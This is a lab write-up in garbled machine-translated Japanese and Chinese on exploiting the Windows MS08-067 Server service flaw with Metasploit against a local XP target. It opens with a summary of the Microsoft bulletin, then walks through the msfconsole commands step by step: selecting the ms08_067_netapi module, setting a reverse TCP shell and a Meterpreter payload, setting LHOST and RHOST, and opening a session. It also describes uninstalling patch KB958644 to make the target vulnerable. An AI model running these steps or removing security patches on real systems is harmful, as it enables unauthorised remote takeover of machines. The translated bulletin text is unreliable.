簡単な脆弱性
ms08- 067 エディタを議論 MS08を -067脆弱性がサーバー以外のWindowsに影響を及ぼし2008など、Windowsのコア以外のすべてのシステム、対象:Windows 2000 / XP / Serverの2003 / Vistaの/ Server 2008人のバージョン、およびWindowsさえのテストフェーズが含ま7プロ- ベータ版。 中国名の MS08 - 067 英語名の MS08 - 067 発売日: 日2008年 / 10 / 22 ダウンロードサイズ: オペレーティングシステム固有に応じて カテゴリの 脆弱性の 説明:マイクロソフトセキュリティ情報KB958644 脆弱性:サーバーサービスは、リモートでコードが実行される脆弱性により 日:日2008年 / 10 / 22 ダウンロードサイズ:オペレーティングシステムによって異なります。 影響を受けるオペレーティング・システム:Windows2000 ; XP、サーバー2003 ;ビスタ;サーバー2008 ; 7 ベータ版の 概要 このセキュリティ更新プログラムは、Serverサービスの秘密のレポートで脆弱性を解決します。ユーザは、影響を受けるシステムに特別に細工したRPCリクエストを受け取った場合、この脆弱性により、リモートでコードが実行される可能性があります。マイクロソフトではWindowsでは2000、Windows XPのサーバーおよびWindows 2003 システム上でこの脆弱性を悪用し、任意のコードを実行するための認証なしで攻撃される可能性があります。この脆弱性は、ワーム攻撃に使用することができます。ファイアウォールによる最善策および標準のファイアウォールの既定の構成は、エンタープライズ境界の外部から行われる攻撃からネットワークリソースを保護することができます。この更新プログラムをインストールすると、お使いのコンピュータを保護することができます。インストールが完了したら、コンピュータを再起動する必要があります。 深刻度:Windowsの2000 ; XP、Server 2003には、深刻な、Windows Vistaのです。サーバー2008 ; 7ベータ版が重要です。
0X02戦闘
ドローンIP 192.168.1.134の窓
攻撃機192.168.1.137カーリー
最初の試みは、pingを実行することはできません
pingを実行することができます
MS08_067リモートの攻撃の練習:シェル
オープンmsfconsoleのカリ端末1、。
2その後、抜け穴を見つけるために、このメソッドを使用します
msf5> 検索ms08_067 マッチングモジュール ================ #名前ディスクロージャー日付ランクチェックの説明 - ---- --------------- - --- ----- ----------- 0 活用/窓/ SMB / ms08_067_netapi 日2008年 - 10 - 28 偉大はいMS08- 067 Microsoftサーバーサービス相対パススタック破損
図3は、コマンドを入力してuse exploit/windows/smb/ms08_067_netapi
、脆弱性モジュールの使用を入力してください。
4、入力コマンドは、show payload
以下に示すように、我々はshell_reverse_tcpを発見した、効果的な攻撃の負荷を表示します。
図5に示すように、コマンドはshow targets
以下に示すように、無人機のオペレーティングシステムのモデルを攻撃することが示されます。
図6は、コマンドを使用するとset payload generic/shell_reverse_tcp
、攻撃のペイロードを設定します。
7、コマンドを入力します。show options
我々は、図の赤いボックス囲まれた部分として、攻撃前に設定する必要があるデータが表示されます。
8、コマンドを入力します。
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.137 LHOST => 192.168.1.137 msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.134 RHOST => 192.168.134
然后9、输入命令exploit
开始攻击,如下图所示是正常攻击成功结果。
返回seesion就可以拿到shell
Seeion –L
就你可以看见这个shell
Seeions –I 1
进入shell
下面是转的别人的
MS08_067远程漏洞攻击实践:meterpreter
1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi
,进入ms08_067漏洞模块。
2、设置payload:set payload windows/meterpreter/reverse_tcp
3、show options
,查看需要设置的ip地址,如下图所示,是已经设置好的
4、成功攻击结果:
5、执行ifconfig
,查看靶机地址:
6、ps
查看进程:
7、meterpreter转shell:
实验中遇到的问题
1、在做实验的时候用老师的xp系统作为靶机,但是在exploit的时候显示如下:no session was created。
2、手动设置一个set session 1
,结果还是不成功。
3、在exploit
前,使用check
查看靶机状态,返回以下信息,表明目标主机是安全的,不能被攻击。
4、网上查到可以卸载ms08_067的补丁,即卸载KB958644,文件路径:c:/windows找到KB958644(这是个隐藏文件),打开卸载exe程序,如下:
5、重启后,还是不能成功,最后找了一个英文版的win xp sp 3 ,才成功完成。